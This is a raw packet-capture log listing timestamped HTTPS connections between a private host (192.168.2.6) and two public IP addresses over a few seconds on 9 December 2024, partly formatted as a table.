                                                                                                                      Dec 9, 2024 16:34:17.874497890 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.874510050 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.874541044 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.874571085 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.878845930 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.878894091 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.878942013 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.878968954 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.879003048 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.879003048 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.881244898 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.881270885 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.881323099 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.881350040 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.881371975 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.881390095 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.884094954 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.884121895 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.884203911 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.884221077 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.884251118 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.884315968 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.886603117 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.886625051 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.886686087 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.886713982 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.886733055 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.886756897 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.889019966 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.889062881 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.889106989 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.889130116 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.889168024 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.889210939 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.891762972 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.891783953 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.891875029 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.891901016 CET44349739150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.891949892 CET49739443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.894752979 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.894792080 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.894848108 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.894864082 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.894882917 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.894912004 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:17.896579027 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.896600962 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:17.896662951 CET49731443192.168.2.6150.171.27.10
Timestamp                           Src Port  Dst Port  Source IP      Dest IP
Dec 9, 2024 16:34:17.896686077 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.896709919 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.896730900 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.899745941 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.899771929 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.899816036 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.899822950 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.899894953 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.899894953 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.903736115 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.903762102 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.903814077 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.903832912 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.903857946 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.903876066 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.904236078 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.904267073 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.904356956 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.904371977 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.904385090 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.904428959 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.906955004 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.906972885 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.907033920 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.907061100 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.907079935 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.907100916 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.910389900 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.910429001 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.910505056 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.910516024 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.910567045 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.910567045 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.914577007 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.914597034 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.914706945 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.914731979 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.914787054 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.916001081 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.916033030 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.916104078 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.916125059 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.916172981 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.916172981 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.916549921 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.916568041 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.916629076 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.916660070 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.916682005 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.916702032 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.922219992 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.922249079 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.922313929 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.922321081 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.922363043 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.922363043 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.926285982 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926320076 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926350117 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926367998 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926373959 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.926390886 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926453114 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926455021 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.926476002 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926481962 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926492929 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.926492929 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.926559925 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.926587105 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.926614046 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.926628113 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.928102970 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.928204060 CET  443       49733     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.928230047 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.928251982 CET  49733     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.936249971 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.936292887 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.936341047 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.936368942 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.936399937 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.936415911 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.936793089 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.936822891 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.936903000 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.936903000 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.936918020 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.936980009 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.937304974 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.937321901 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.937376976 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.937403917 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:17.937421083 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:17.937442064 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.047400951 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.047451973 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.047506094 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.047540903 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.047554970 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.047578096 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.047624111 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.055239916 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.055243969 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.055272102 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.055272102 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.055363894 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.055388927 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.055427074 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.055428982 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.055428982 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.055449009 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.055459023 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.055514097 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.062428951 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.062458992 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.062510014 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.062517881 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.062563896 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.067145109 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.067171097 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.067220926 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.067239046 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.067275047 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.067284107 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.071796894 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.071820021 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.071896076 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.071909904 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.071949959 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.074491978 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.074520111 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.074569941 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.074585915 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.074634075 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.074634075 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.079756021 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.079782963 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.079864025 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.079875946 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.079886913 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.079920053 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.082259893 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.082292080 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.082339048 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.082354069 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.082379103 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.082448959 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.087620974 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.087649107 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.087692976 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.087708950 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.087743998 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.087760925 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.090539932 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.090565920 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.090656996 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.090656996 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.090672970 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.090707064 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.095175028 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.095196009 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.095256090 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.095263004 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.095304012 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.098020077 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.098050117 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.098126888 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.098135948 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.098155975 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.098195076 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.100923061 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.100965977 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.100987911 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.100999117 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.101016045 CET  443       49731     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.101041079 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.101058006 CET  49731     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.106913090 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.106941938 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.106981039 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.106996059 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.107049942 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.107049942 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.115782022 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.115816116 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.115914106 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.115914106 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.115933895 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.116128922 CET  49732     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.210962057 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.225636005 CET  49739     443       192.168.2.6    150.171.27.10
Dec 9, 2024 16:34:18.225672007 CET  443       49739     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.240885019 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.241041899 CET  443       49732     150.171.27.10  192.168.2.6
Dec 9, 2024 16:34:18.241065025 CET  49732     443       192.168.2.6    150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:18.241398096 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:18.348114014 CET49733443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:18.348153114 CET44349733150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:18.348965883 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:18.350126982 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:18.350135088 CET49732443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:18.350164890 CET44349732150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:18.359229088 CET49731443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:18.359266996 CET44349731150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.286166906 CET49703443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:22.286262989 CET49703443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:22.286777973 CET49758443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:22.286823988 CET44349758173.222.162.64192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.287197113 CET49758443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:22.287489891 CET49758443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:22.287503958 CET44349758173.222.162.64192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.405740976 CET44349703173.222.162.64192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.405810118 CET44349703173.222.162.64192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.753684044 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:22.753741980 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.754003048 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:22.764692068 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:22.764719009 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.916389942 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:22.916445017 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.916604042 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:22.917491913 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:22.917503119 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:22.922271013 CET49758443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:24.289253950 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.289331913 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.350266933 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.350300074 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.449063063 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.449193001 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.597203970 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.597213030 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.598614931 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.598639965 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.598954916 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.598959923 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.961889029 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.961921930 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.961937904 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.961972952 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.962002993 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.962028027 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.962029934 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.962052107 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.962066889 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.962086916 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.962090969 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.962115049 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:24.962127924 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:24.962162018 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.146271944 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.146301031 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.146342993 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.146390915 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.146425009 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.146684885 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.147634029 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.147661924 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.147711039 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.147733927 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.147754908 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.147772074 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.196757078 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.196791887 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.196856022 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.196882963 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.196929932 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.198019028 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.198049068 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.198138952 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.198168993 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.198209047 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.314583063 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.314610958 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.314699888 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.314727068 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.314785004 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.321170092 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.321209908 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.321244001 CET49760443192.168.2.6150.171.27.10
